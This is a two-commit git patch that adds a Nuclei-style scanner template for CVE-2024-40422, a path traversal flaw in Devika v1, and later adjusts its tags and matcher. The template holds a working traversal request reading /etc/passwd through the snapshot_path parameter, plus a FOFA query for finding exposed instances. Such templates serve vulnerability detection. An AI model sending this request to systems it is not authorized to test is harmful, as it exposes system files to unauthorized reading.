From 8bdf26247378812785c51de3b6181ab9320523d4 Mon Sep 17 00:00:00 2001
From: Kazgangap <halilkirazkaya@yandex.com>
Date: Mon, 5 Aug 2024 20:49:38 +0300
Subject: [PATCH 1/2] add CVE-2024-40422

---
 http/cves/2024/CVE-2024-40422.yaml | 65 ++++++++++++++++++++++++++++++
 1 file changed, 65 insertions(+)
 create mode 100644 http/cves/2024/CVE-2024-40422.yaml

diff --git a/http/cves/2024/CVE-2024-40422.yaml b/http/cves/2024/CVE-2024-40422.yaml
new file mode 100644
index 0000000000..b72c8c6349
--- /dev/null
+++ b/http/cves/2024/CVE-2024-40422.yaml
@@ -0,0 +1,65 @@
+id: CVE-2024-40422
+
+info:
+  name: Devika v1 - Path Traversal
+  author: securityforeveryone,alpernae
+  severity: critical
+  description: |
+    The snapshot_path parameter in the /api/get-browser-snapshot endpoint in stitionai devika v1 is susceptible to a path traversal attack. An attacker can manipulate the snapshot_path parameter to traverse directories and access sensitive files on the server. This can potentially lead to unauthorized access to critical system files and compromise the confidentiality and integrity of the system.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-40422
+    - https://cvefeed.io/vuln/detail/CVE-2024-40422
+    - https://github.com/alpernae/CVE-2024-40422
+    - https://github.com/stitionai/devika
+    - https://www.exploit-db.com/exploits/52066
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
+    cvss-score: 9.1
+    cve-id: CVE-2024-40422
+    cwe-id: CWE-22
+    epss-score: 0.0087
+    epss-percentile: 0.82513
+    cpe: cpe:2.3:a:stitionai:devika:1.0:*:*:*:*:*:*:*
+  metadata:
+    max-request: 1
+    vendor: stitionai
+    product: devika
+    fofa-query: icon_hash="-1429839495"
+  tags: cve,cve2024,devika,path-traversal
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        GET /api/data HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains_all(body,"models","projects","OPENAI","OLLAMA")'
+          - 'contains(content_type,"application/json")'
+          - 'status_code == 200'
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        GET /api/get-browser-snapshot?snapshot_path=../../../../etc/passwd HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - 'root:.*:0:0:'
+
+      - type: word
+        part: header
+        words:
+          - 'application/octet-stream'
+
+      - type: status
+        status:
+          - 200

From 15ac2b622dea2c0b72b4c08674cb715525a9e520 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Tue, 6 Aug 2024 19:01:54 +0530
Subject: [PATCH 2/2] Update CVE-2024-40422.yaml

---
 http/cves/2024/CVE-2024-40422.yaml | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/http/cves/2024/CVE-2024-40422.yaml b/http/cves/2024/CVE-2024-40422.yaml
index b72c8c6349..450fad8d83 100644
--- a/http/cves/2024/CVE-2024-40422.yaml
+++ b/http/cves/2024/CVE-2024-40422.yaml
@@ -25,7 +25,7 @@ info:
     vendor: stitionai
     product: devika
     fofa-query: icon_hash="-1429839495"
-  tags: cve,cve2024,devika,path-traversal
+  tags: cve,cve2024,devika,lfi
 
 flow: http(1) && http(2)
 
@@ -52,6 +52,7 @@ http:
     matchers-condition: and
     matchers:
       - type: regex
+        part: body
         regex:
           - 'root:.*:0:0:'